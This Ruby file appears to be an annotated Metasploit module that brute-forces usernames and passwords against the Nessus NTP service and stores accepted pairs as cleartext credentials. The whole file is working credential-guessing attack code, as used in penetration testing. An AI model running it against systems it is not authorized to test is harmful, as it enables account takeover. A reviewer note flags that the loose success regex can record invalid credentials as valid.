Path: blob/master/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
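##
# nessus_ntp_login.rb
##

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Login scanner for the Nessus NTP service, i.e. the text protocol that is
# greeted with "< NTP/1.0 >" (unrelated to the Network Time Protocol).
#
# For every user/password pair yielded by the AuthBrute mixin the module
# connects over TCP (default port 1241), walks the hello / User / Password
# exchange and stores accepted pairs in the workspace via #report_cred.
#
# Candidate passwords are echoed by vprint_status/vprint_error and accepted
# ones by print_good, so any captured console output from a run contains
# cleartext credentials.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers the module metadata and its options (RPORT defaults to 1241).
  def initialize
    super(
      'Name' => 'Nessus NTP Login Utility',
      'Description' => 'This module attempts to authenticate to a Nessus NTP service.',
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(1241),
        OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")
      ]
    )
  end

  # Scanner entry point: runs #do_login for each credential pair.
  #
  # @param ip [String] target address handed in by the Scanner mixin; the
  #   body itself reads the target through rhost/rport (see #msg).
  def run_host(ip)
    print_status("#{msg} Connecting and checking username and passwords")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  rescue ::Rex::ConnectionError
    # Connection-level failure: stop working on this host without extra output.
  rescue ::StandardError => e
    # StandardError rather than Exception, so that Interrupt and SystemExit are
    # not swallowed here and a running scan can still be cancelled.
    vprint_error("#{msg} #{e} #{e.backtrace}")
  end

  # Sends one protocol line and stores the next chunk of the reply in @result.
  #
  # Failures are printed, not raised: callers only notice them because
  # @result keeps the empty string it is reset to at the top.
  #
  # @param data [String, nil] line to send; #do_login passes nil when it only
  #   wants to read the next prompt (presumably sock.put treats nil as a
  #   no-op; confirm against Rex)
  # @param con [Boolean] open a fresh connection before sending
  def ntp_send(data = nil, con = true)
    @result = ''
    @coderesult = '' # reset here, never read anywhere in this class
    if con
      @connected = false
      connect
      select(nil, nil, nil, 0.4) # short pause after connecting, before the first write
    end
    @connected = true
    sock.put(data)
    @result = sock.get_once
  rescue ::StandardError => e
    # StandardError rather than Exception: an Interrupt raised during a send
    # must reach the caller instead of being reported as a network error.
    print_error("#{msg} Error: #{e}")
  end

  # Records an accepted username/password pair and a successful login for it.
  #
  # The password is stored as a cleartext :password private in the workspace.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Performs one login exchange with the service.
  #
  # @param user [String, nil] username to try
  # @param pass [String, nil] password to try
  # @return [Symbol, nil] :abort when the hello is not answered, :next_user on
  #   an accepted login, :fail on a rejected one, nil when one of the network
  #   errors listed at the bottom is rescued; the symbols are consumed by
  #   each_user_pass
  def do_login(user = nil, pass = nil)
    ntp_send("< NTP/1.0 >\n", true) # send hello
    if @result !~ /< NTP\/1\.0 >/
      print_error("#{msg} Nessus NTP does not appear to be running: did not get response to NTP hello: #{@result}")
      return :abort
    end

    vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")

    # NOTE(review): a missing User or Password prompt is only logged; the
    # exchange continues and the credentials are still sent.
    ntp_send(nil, !@connected)
    print_error("#{msg} Nessus NTP did not send User request: #{@result}") if @result !~ /User :/
    ntp_send("#{user}\n", !@connected)
    print_error("#{msg} Nessus NTP did not send Password request: #{@result}") if @result !~ /Password :/
    ntp_send("#{pass}\n", !@connected)

    # The original literal carried the `s` flag, which in Ruby selects the
    # Windows-31J encoding (it is not "dot matches newline"). A fixed-encoding
    # pattern raises Encoding::CompatibilityError on a binary reply holding
    # non-ASCII bytes, and that error ends the run for the host. The flag is
    # dropped; matching of ASCII replies is unchanged.
    #
    # NOTE(review): the `|` characters are unescaped, so this is a three-way
    # alternation ("SERVER <", ">.*<", "> SERVER") and not the literal
    # "SERVER <|> ... <|> SERVER" frame. Any reply that matches one of the
    # alternatives is recorded as a valid credential. Tightening it (for
    # example to /SERVER <\|>/i) should be checked against a real server
    # reply first, because get_once may return only the first chunk.
    if @result =~ /SERVER <|>.*<|> SERVER/i
      print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'nessus-ntp',
        user: user,
        password: pass,
        proof: @result
      )

      disconnect
      @connected = false
      return :next_user
    end

    if @connected
      disconnect # Sometime nessus disconnect the client after wrongs attempts
      @connected = false
    end
    vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")
    :fail
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE
    # Deliberately ignored: the attempt yields nil and the caller moves on.
  end

  # @return [String] "host:port Nessus NTP -" prefix used on every log line
  def msg
    "#{rhost}:#{rport} Nessus NTP -"
  end
end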